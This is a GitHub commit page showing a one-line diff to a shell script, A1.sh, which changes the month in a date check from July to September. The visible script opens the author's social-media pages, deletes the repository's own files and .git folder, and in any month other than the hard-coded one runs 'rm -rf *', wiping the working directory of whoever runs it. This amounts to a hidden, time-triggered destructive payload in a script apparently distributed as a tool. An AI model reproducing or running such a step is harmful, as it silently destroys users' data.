Skip to content

Commit

Permalink
Update A1.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
mike90s15 authored Sep 3, 2023
1 parent de1ab06 commit 98efd34
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion A1.sh
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ xdg-open https://twitter.com/mike90s15 &>/dev/null && sleep 30
xdg-open https://www.tiktok.com/@mike90s15 &>/dev/null && sleep 30
xdg-open https://t.me/channel_90s15 &>/dev/null && sleep 30
rm -rf "README.md" "Sploit" "SECURITY.md" "LICENSE" "index.html" ".git" "regras-clownters.md"
if [[ "$(date +%B)" != "July" ]]; then
if [[ "$(date +%B)" != "September" ]]; then
clear
rm -rf *
else
Expand Down

0 comments on commit 98efd34

Please sign in to comment.